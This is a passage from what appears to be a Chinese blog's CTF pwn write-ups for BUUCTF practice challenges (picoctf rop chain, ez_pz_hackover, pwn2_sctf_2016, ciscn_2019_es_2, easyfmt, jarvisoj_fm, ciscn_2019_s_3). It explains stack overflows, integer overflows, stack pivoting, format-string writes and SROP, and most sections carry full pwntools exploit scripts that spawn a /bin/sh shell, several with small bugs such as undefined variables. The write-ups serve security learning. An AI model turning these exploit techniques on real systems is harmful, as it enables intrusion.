class="hljs-number">0x0400733</span><br>pop_rsi_r15=<span class="hljs-number">0x0400731</span><br>ret=<span class="hljs-number">0x04004d1</span><br>fmt_str=<span class="hljs-number">0x0400770</span><br><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)+p64(pop_rdi)+p64(fmt_str)+p64(pop_rsi_r15)+p64(read_got)+p64(<span class="hljs-number">0</span>)+p64(printf_plt)+p64(main)<br>sh.recvuntil(<span class="hljs-string">&#x27;name?&#x27;</span>)<br>sh.sendline(payload)<br><br>read_addr = u64(sh.recvuntil(<span class="hljs-string">&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\x00&#x27;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(read_addr))<br><br>libc=ELF(<span class="hljs-string">&#x27;./libc.so.6&#x27;</span>)<br>libc_base = read_addr - libc.sym[<span class="hljs-string">&#x27;read&#x27;</span>]<br>system = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>binsh = libc_base+<span class="hljs-built_in">next</span>(libc.search(flat(<span class="hljs-string">&quot;/bin/sh&quot;</span>)))  <br><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)+p64(pop_rdi)+p64(binsh)+p64(system) <br>sh.recvuntil(<span class="hljs-string">&#x27;name?&#x27;</span>)<br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></table></figure>

<blockquote>
<p>学到了一个找 flag 的新方法🥹：</p>
<p>如果 flag 被藏起来了，可以使用 find -name “flag” 命令来查找，然后根据查找出的地址直接 cat &#x2F;file&#x2F;flag</p>
</blockquote>
<h3 id="picoctf-2018-rop-chain"><a href="#picoctf-2018-rop-chain" class="headerlink" title="picoctf_2018_rop chain"></a>picoctf_2018_rop chain</h3><p>main 函数就是 gets 栈溢出，get flag() 后门函数直接就可以输出 flag。但需要满足以下条件：</p>
<p>![](&#x2F;img&#x2F;复健&#x2F;picoctf_2018_rop chain_flag.png)</p>
<blockquote>
<p>a1 的值点击后右键选择 Hexadecimal</p>
</blockquote>
<p>win1和 win2 都是由对应的函数进行设置：</p>
<p>![](&#x2F;img&#x2F;复健&#x2F;picoctf_2018_rop chain_win1.png)</p>
<p>其中 a1是直接向 win_function2() 传参，我们也直接在 payload 里构造就好。</p>
<p>![](&#x2F;img&#x2F;复健&#x2F;picoctf_2018_rop chain_win2.png)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>sh=remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">26951</span>)<br>win1=<span class="hljs-number">0x080485CB</span><br><br>win2=<span class="hljs-number">0x080485D8</span><br>flag=<span class="hljs-number">0x0804862B</span><br><br>a11=<span class="hljs-number">0xBAAAAAAD</span><br>a12=<span class="hljs-number">0xDEADBAAD</span><br><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x18</span>+<span class="hljs-number">4</span>)+p32(win1)+p32(win2)+p32(flag)+p32(a11)+p32(a12)<br><br>sh.sendline(payload)<br><br>sh.interactive()<br><br></code></pre></td></tr></table></figure>



<h4 id="ez-pz-hackover-2016"><a href="#ez-pz-hackover-2016" class="headerlink" title="ez_pz_hackover_2016"></a>ez_pz_hackover_2016</h4><p>难得的，好久不见的 NX 保护没开的题目，那就是写 shellcode 嘛。</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ez_pz_hackover_2016_check.png" srcset="/img/loading.gif" lazyload></p>
<p>漏洞就在 chall 函数和 vuln 函数里：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ez_pz_hackover_2016_main.png" srcset="/img/loading.gif" lazyload></p>
<blockquote>
<p>memchr() 函数就是将 ‘\n’ 之后的数据置为0</p>
</blockquote>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ez_pz_hackover_2016_vuln.png" srcset="/img/loading.gif" lazyload></p>
<p>综合来考虑就是我们需要先绕过 main 函数中的 strcmp 比较，所以我们部署的 <em>s</em> 的组成就是 “<code>crashme+&#39;\x00&#39;+其他</code>“ 。</p>
<p>再结合到 vuln 函数，我们覆盖住 dest 的缓冲区，并在栈上部署 shellcode ，将返回地址修改为 shellcode 地址即可。</p>
<p>开始的时候程序泄露了栈地址，也就是运行的时候 s 开始的地址，我们可以利用给出的栈地址做基地址来计算到 shellcode 的偏移来得出shellcode的地址，虽然地址会随机化但是偏移量不会变。</p>
<p>所以我们初步确定payload组成是 <code>b&#39;crashme\x00&#39;+offest+p32(shellcode_add)+shellcode</code></p>
<p>我们调试一下 shellcode 的偏移，就是看我们的 EBP 距离 s 的偏移再加4（ leave,ret ）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>sh=process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br><br>gdb.attach(sh,<span class="hljs-string">&#x27;b *0x8048600&#x27;</span>)  <span class="hljs-comment">#利用gdb动调，在0x8048600处下了个断点</span><br><br>sh.recvuntil(<span class="hljs-string">&#x27;crash: &#x27;</span>)<br>stack=<span class="hljs-built_in">int</span>(p.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(stack))<br><br>payload=<span class="hljs-string">&#x27;crashme\x00&#x27;</span>+<span class="hljs-string">&#x27;aaaaaa&#x27;</span><br>sh.sendline(payload)<br><br>pause()<br></code></pre></td></tr></table></figure>

<p><img src="/img/%E5%A4%8D%E5%81%A5/ez_pz_hackover_2016_offest.png" srcset="/img/loading.gif" lazyload></p>
<p>所以我们要填充的区域就是就是 <code>0x38-0x22+4=0x1A</code> 。</p>
<p>同理也可以计算出 shellcode 的地址偏移，需要注意，<code>vuln(src, n)</code> 里 memcpy 的第二个参数是 &amp;src 而不是 src ，所以并不是把 src处的东西拷贝到 dest，而是从 ebp+8 开始拷贝。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>sh=process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br><br>p.recvuntil(<span class="hljs-string">&#x27;crash: &#x27;</span>)<br>stack=<span class="hljs-built_in">int</span>(sh.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(stack))<br><br>shellcode=stack-<span class="hljs-number">0x1c</span><br>payload=<span class="hljs-string">&#x27;crashme\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x1a</span>-<span class="hljs-number">8</span>)+p32(shellcode_addr)+asm(shellcraft.sh())<br>sh.sendline(payload)<br>sh.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="整数溢出"><a href="#整数溢出" class="headerlink" title="整数溢出"></a>整数溢出</h1><h3 id="pwn2-sctf-2016"><a href="#pwn2-sctf-2016" class="headerlink" title="pwn2_sctf_2016"></a>pwn2_sctf_2016</h3><p>vuln 函数中的逻辑如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/pwn2_sctf_2016_main.png" srcset="/img/loading.gif" lazyload></p>
<p>在最开始接收用户想要输入的字符长度，有一个 if 检查确保用户的输入小于 32。但是用来接受输入的函数 <code>get_n()</code> 并不是系统函数，具体如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/pwn2_sctf_2016_getin.png" srcset="/img/loading.gif" lazyload></p>
<p>它所接收和返回的都是 unsigned int 类型，所以我们就可以利用整数溢出来绕过 main 函数中的检查 。</p>
<p>而后的步骤就是正常的 ret2rop  流程了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>,arch=<span class="hljs-string">&#x27;i386&#x27;</span>,os=<span class="hljs-string">&#x27;linux&#x27;</span>) <br>sh=remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">27438</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>vuln=<span class="hljs-number">0x0804852F</span><br>main_addr = elf.symbols[<span class="hljs-string">&#x27;main&#x27;</span>]<br><br>printf_plt = elf.plt[<span class="hljs-string">&quot;printf&quot;</span>]<br>printf_got = elf.got[<span class="hljs-string">&quot;printf&quot;</span>]<br><br>sh.recvuntil(<span class="hljs-string">&#x27;read? &#x27;</span>)<br>sh.sendline(<span class="hljs-string">b&#x27;-1&#x27;</span>)<br><br>sh.recvuntil(<span class="hljs-string">&#x27;data!\n&#x27;</span>)<br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x2c</span>+<span class="hljs-number">4</span>)+p32(printf_plt)+p32(vuln)+p32(printf_got)<br>sh.sendline(payload)<br><br>sh.recvuntil(<span class="hljs-string">&#x27;\n&#x27;</span>)<br>printf_addr=u32(sh.recv(<span class="hljs-number">4</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(printf_addr))<br><br>libc=LibcSearcher(<span class="hljs-string">&#x27;printf&#x27;</span>,printf_addr)  <br>base=printf_addr-libc.dump(<span class="hljs-string">&#x27;printf&#x27;</span>)    <br>bin_sh=base+libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br>system=base+libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br><br>sh.recvuntil(<span class="hljs-string">&#x27;read? &#x27;</span>)<br>sh.sendline(<span class="hljs-string">b&#x27;-1&#x27;</span>)<br><br>sh.recvuntil(<span class="hljs-string">&#x27;data!\n&#x27;</span>)<br>payload=<span class="hljs-string">b&quot;a&quot;</span>*(<span class="hljs-number">0x2c</span>+<span class="hljs-number">4</span>) + p32(system) + p32(main_addr)+p32(bin_sh)<br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></table></figure>

<p>出现了一点问题，本地能打通远程打不通，搜出来的libc版本都不一样，我四处冲浪发现了一位师傅的评论：</p>
<p>![](&#x2F;img&#x2F;复健&#x2F;No libc satisfies constraints.png)</p>
<p>不管了！本地通了就是通了🥹</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/pwn2_sctf_2016_pwn.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="bjdctf-2020-babystack2"><a href="#bjdctf-2020-babystack2" class="headerlink" title="bjdctf_2020_babystack2"></a>bjdctf_2020_babystack2</h3><p>是一个整数溢出的题</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/bjdctf_2020_babystack2_main.png" srcset="/img/loading.gif" lazyload></p>
<p>main函数中的逻辑是这样的，程序中另外有现成的后门函数，如果在读入 buf 时溢出修改返回地址就可以直接 get shell。</p>
<p>buf 的长度为 0x10 ，但是在输入前有一个 if 条件检验输入的数字不能大于 10。</p>
<p>scanf 处的 nbytes 是 unsigned int，unsigned int 是无符号整型，我们如果输入的是 -1就会变成 unsigned int 的最大值，这样就可以绕过检测并提供足够的空间用来溢出。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>sh=process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br>sh.recvuntil(<span class="hljs-string">&quot;Please input the length of your name:\n&quot;</span>)<br>sh.sendline(<span class="hljs-string">&#x27;-1&#x27;</span>)<br><br>sh.recvuntil(<span class="hljs-string">&quot;What&#x27;s u name?\n&quot;</span>)<br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x10</span>+<span class="hljs-number">8</span>)+p64(<span class="hljs-number">0x0400726</span>)<br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="栈迁移"><a href="#栈迁移" class="headerlink" title="栈迁移"></a>栈迁移</h1><h3 id="ciscn-2019-es-2"><a href="#ciscn-2019-es-2" class="headerlink" title="ciscn_2019_es_2"></a>ciscn_2019_es_2</h3><p>程序自带一个后门函数，但是有个坑：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_es_2_hack.png" srcset="/img/loading.gif" lazyload></p>
<p>它这个地方 echo flag 是真的只是输出了 “flag”。但这不是什么问题我们给 system 函数传入一个 “&#x2F;bin&#x2F;sh” 就行。</p>
<blockquote>
<p>一开始看错了我还想说怎么打不通明明没问题😅</p>
</blockquote>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_es_2_flag.png" srcset="/img/loading.gif" lazyload></p>
<p>main 函数没什么可看的，直接进入 <code>vul</code></p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_es_2_vul.png" srcset="/img/loading.gif" lazyload></p>
<p>s 长度为 0x28 ，但是 read 只能读入 0x30 字节，我们想要溢出的话也只能覆盖 s 缓冲区+ebp+ret，不能容纳我们添加新的返回地址。</p>
<p>这个时候我们就可以考虑栈迁移。</p>
<p>如果溢出的空间足够，我们就可以构造如下的栈结构来get shell </p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_es_2_stack.png" srcset="/img/loading.gif" lazyload></p>
<p>栈迁移的话栈结构的构造也没什么变化，就是给它把这一部分虚假的栈结构（x 放到别的地方去而已。这道题的话我们就直接控制栈到 s 的缓冲区来构造 rop 即可。</p>
<p>这样，题目中给的两次 read  和 print 都是可以供我们利用的。第一次 read 泄露栈地址用来栈迁移，第二次用来执行栈迁移，控制 ret 跳转到我们所迁移的栈上。</p>
<p>由于 <code>printf(&quot;%s&quot;)</code> 在 <code>&#39;\x00&#39;</code> 存在截断，因此只需要填充 padding 到 ebp 位置，就可以 printf 泄露 ebp 的值。</p>
<p>通过 GDB 调试可以获得 ebp 在栈上的偏移为 0x38 </p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/3cciscn_2019_es_2_ebp.png" srcset="/img/loading.gif" lazyload> </p>
<p>所以我们只要将 <code>ebp-0x34</code> 即可获得栈地址。</p>
<p>第二次输入 s 时就正常构造 rop 链即可，另须注意每次 ret 都会让 esp+4，需要在 rop 链前加四字节的 padding。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>,arch=<span class="hljs-string">&#x27;i386&#x27;</span>,os=<span class="hljs-string">&#x27;linux&#x27;</span>) <br>r=remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">28389</span>)<br><br>sys=<span class="hljs-number">0x8048400</span><br>leave_ret=<span class="hljs-number">0x08048562</span><br>payload=<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x27</span>+<span class="hljs-string">&#x27;b&#x27;</span><br>r.send(payload)<br>r.recvuntil(<span class="hljs-string">&quot;b&quot;</span>)<br>ebp=u32(r.recv(<span class="hljs-number">4</span>))<br>s=ebp-<span class="hljs-number">0x38</span><br>payload2=<span class="hljs-string">b&#x27;aaaa&#x27;</span>+p32(sys)+p32(<span class="hljs-number">1</span>)+p32(s+<span class="hljs-number">0x10</span>)+<span class="hljs-string">b&quot;/bin/sh&quot;</span><br>payload2=payload2.ljust(<span class="hljs-number">0x28</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>)<br>payload2+=p32(s)+p32(leave_ret)<br>r.send(payload2)<br>r.interactive()<br><br></code></pre></td></tr></table></figure>





<h1 id="格式化字符串"><a href="#格式化字符串" class="headerlink" title="格式化字符串"></a>格式化字符串</h1><h3 id="easyfmt"><a href="#easyfmt" class="headerlink" title="easyfmt"></a>easyfmt</h3><h5 id="分析题目"><a href="#分析题目" class="headerlink" title="分析题目"></a>分析题目</h5><p>按照做题习惯先看一下文件保护，只开启了 canary 和 NX</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/easyfmt-checksec.png" srcset="/img/loading.gif" lazyload></p>
<p>直接放进 ida 反编译</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/easyfmt-main.png" srcset="/img/loading.gif" lazyload></p>
<p>进入格式化字符串漏洞之前有一个 if 条件检测 CheckIn 函数，看一下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/easyfmt-checkin.png" srcset="/img/loading.gif" lazyload></p>
<p>最后一行 <code>return</code> 是让 <em>buf</em> 强制转换为一个 _BYTE 类型的数据也就是只有一位数字，和 v2 比较是否相等。随便填一个数字，多试几次肯定能行👻</p>
<p>成功后跳出 CheckIn 来看漏洞利用部分，只有一个 printf，但肯定要想办法多次利用它才行。就直接第一次利用 printf 先改掉 exit 的 got 表，让它跳转到 if 检测后的地址。</p>
<h5 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h5><p>通过 checkin 检测以后先修改 exit 的 got 表，然后第二次漏洞利用泄露 put 的地址，利用 ret2libc 查询 system 地址，第三次利用改掉put 的 got 表，第四次写入”&#x2F;bin&#x2F;sh”，让程序运行结束跳转回去执行<code>system(&quot;/bin/sh&quot;);</code> ，完成 getshell。</p>
<p>格式化字符串要查找一下对应的偏移先，<del>啊忘了怎么搞了</del></p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/easyfmt-padding.png" srcset="/img/loading.gif" lazyload></p>
<p>（我就说多试几次就通过检测了叭🤪</p>
<p>偏移是8</p>
<p>最后结果是</p>
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs prolog">from pwn import *<br>context(arch = <span class="hljs-string">&quot;amd64&quot;</span>,os= <span class="hljs-string">&quot;linux&quot;</span>)<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>a = process(<span class="hljs-string">&#x27;./easyfmt&#x27;</span>)<br>elf = <span class="hljs-symbol">ELF</span>(<span class="hljs-string">&#x27;./easyfmt&#x27;</span>)<br>exit_plt = elf.plt[<span class="hljs-string">&#x27;exit&#x27;</span>]<br>exit_got = elf.got[<span class="hljs-string">&#x27;exit&#x27;</span>]<br>put_plt = elf.plt[<span class="hljs-string">&#x27;put&#x27;</span>]<br>put_got = elf.got[<span class="hljs-string">&#x27;put&#x27;</span>]<br>main_addr = <span class="hljs-number">0x400999</span><br><br>a.sendlineafter(<span class="hljs-string">&#x27;enter&#x27;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br>payload = fmtstr_payload(<span class="hljs-number">8</span>,&#123;exit_got:main_addr&#125;)<br><br>a.sendlineafter(<span class="hljs-string">&#x27;slogan: &#x27;</span>,payload)<br>payload = b<span class="hljs-string">&#x27;%10$sbbb&#x27;</span> + p64(puts_got)<br>a.sendafter(b<span class="hljs-string">&#x27;slogan: \x00&#x27;</span>,payload)<br>puts_addr = u64(a.recvuntil(b<span class="hljs-string">&#x27;bbb&#x27;</span>)[:-<span class="hljs-number">3</span>:].ljust(<span class="hljs-number">8</span>,b<span class="hljs-string">&#x27;\x00&#x27;</span>))<br>print(hex(puts_addr))<br><br>libc=<span class="hljs-symbol">ELF</span>(<span class="hljs-string">&#x27;./glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so&#x27;</span>)<br>libc_base = puts_addr - libc.sym[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>system = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>print(hex(system_addr))<br><br>payload = fmtstr_payload(<span class="hljs-number">10</span>,&#123;printf_got:system_addr&#125;)<br>a.sendlineafter(<span class="hljs-string">&#x27;slogan: &#x27;</span>,payload)<br>a.sendlineafter(<span class="hljs-string">&#x27;slogan: &#x27;</span>,<span class="hljs-string">&#x27;/bin/sh&#x27;</span>)<br>a.interactive()<br> <br></code></pre></td></tr></table></figure>



<h3 id="jarvisoj-fm"><a href="#jarvisoj-fm" class="headerlink" title="jarvisoj_fm"></a>jarvisoj_fm</h3><p>main函数中的逻辑如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/fm_main.png" srcset="/img/loading.gif" lazyload></p>
<p>在 <code>printf(buf)</code> 存在格式化字符串漏洞，再往下的 <em>x</em> 变量在 data 段，我们通过格式化字符串任意写的漏洞修改 <em>x</em> 的值即可。</p>
<p>计算出字符串输入处的偏移是11</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/fm_padding.png" srcset="/img/loading.gif" lazyload></p>
<blockquote>
<p>（nil）也算一位偏移，32位没有寄存器传参所以栈上偏移是多少就是多少</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>sh=process(<span class="hljs-string">&#x27;./fm&#x27;</span>)<br><br>x_add=<span class="hljs-number">0x804A02C</span><br><br>payload=p32(x_add)+<span class="hljs-string">b&quot;%11$n&quot;</span><br><span class="hljs-comment">#先把x的地址传到栈上，再修改此处的地址为x地址的长度即4字节 (这个地方是凑巧了，如果更大的数字比如6就要填充padding补充)</span><br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></table></figure>





<h1 id="系统调用-srop"><a href="#系统调用-srop" class="headerlink" title="系统调用 srop"></a>系统调用 srop</h1><h3 id="ciscn-2019-s-3"><a href="#ciscn-2019-s-3" class="headerlink" title="ciscn_2019_s_3"></a>ciscn_2019_s_3</h3><p>vuln函数里两个系统调用</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_s_3_vuln.png" srcset="/img/loading.gif" lazyload></p>
<p>发现有一个 gadget() 函数，里面有一个return 15L，点进汇编源码那一页可以发现下面还有一个返回 59 的代码。我们可以另外利用这两个系统调用</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_s_3_15_59.png" srcset="/img/loading.gif" lazyload></p>
<blockquote>
<p>系统调用：</p>
<p>每一个系统函数都有一个对应的系统调用号，例如：</p>
<p><code>sys_read</code> 的调用号为 0 、<code>sys_write</code> 的调用号为 1、<code>stub_execve</code> 的调用号为 59、<code>stub_rt_sigreturn</code> 的调用号为 15</p>
</blockquote>
<p>另外需要注意的是，这个题的汇编代码中只有 <code>ret</code> ，没有 <code>leave</code> 指令，所以它不会执行 mov ebp，esp | pop ebp。只要覆盖住 0x10 的缓冲区就可以同时覆盖住返回地址。</p>
<h4 id="方法一-SROP："><a href="#方法一-SROP：" class="headerlink" title="方法一-SROP："></a>方法一-SROP：</h4><p>解题思路就是可以通过 read 伪造一个 sigreturn frame 在栈中，然后执行 sigreturn 的系统调用</p>
<p>本题中不存在 <code>&#39;/bin/sh&#39;</code> 字符，所以需要我们手动输入。我们可以利用栈溢出首先利用本题的 sys_read 去读一个 ‘&#x2F;bin&#x2F;sh’ ，因为栈中的位置都是通过偏移确定的，所以要确定栈偏移。</p>
<p><code>栈地址-字符串在栈中的地址 = offset</code></p>
<p>在 main 函数开始时 rsi 存的便是栈地址，我们通过 GDB 来调试查看</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_s_3_rsi.png" srcset="/img/loading.gif" lazyload></p>
<p>我们在read时输入 ‘&#x2F;bin&#x2F;sh’ ，就可以查看它在栈上的偏移</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_s_3_offest.png" srcset="/img/loading.gif" lazyload></p>
<p>所以 <code>offest=0xf48-0xe30=0x118</code>，binsh_addr&#x3D;栈地址-0x118</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>e=ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br>p=process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>vuln_addr=<span class="hljs-number">0x04004F1</span><br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x10</span>-<span class="hljs-built_in">len</span>(<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>))+p64(vuln_addr)<br><br>p.sendline(payload)<br>add=p.recvuntil(<span class="hljs-string">&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(u64(add)-<span class="hljs-number">0x118</span>))<br>bin_sh=u64(add)-<span class="hljs-number">0x118</span><br>log.info(<span class="hljs-string">&#x27;stack:&#x27;</span>+<span class="hljs-built_in">hex</span>(stack))<br><br>syscall_ret=<span class="hljs-number">0x0400517</span>   <span class="hljs-comment"># syscall ; ret</span><br>rax=<span class="hljs-number">0x004004DA</span>  <span class="hljs-comment">#mov rax, 0Fh;ret</span><br><br>frame = SigreturnFrame()<br>frame.rax = <span class="hljs-number">59</span><br>frame.rdi = bin_sh<br>frame.rsi = <span class="hljs-number">0</span><br>frame.rdx = <span class="hljs-number">0</span><br>frame.rip = syscall_ret<br><br>payload=<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="hljs-string">b&#x27;a&#x27;</span>*(<span 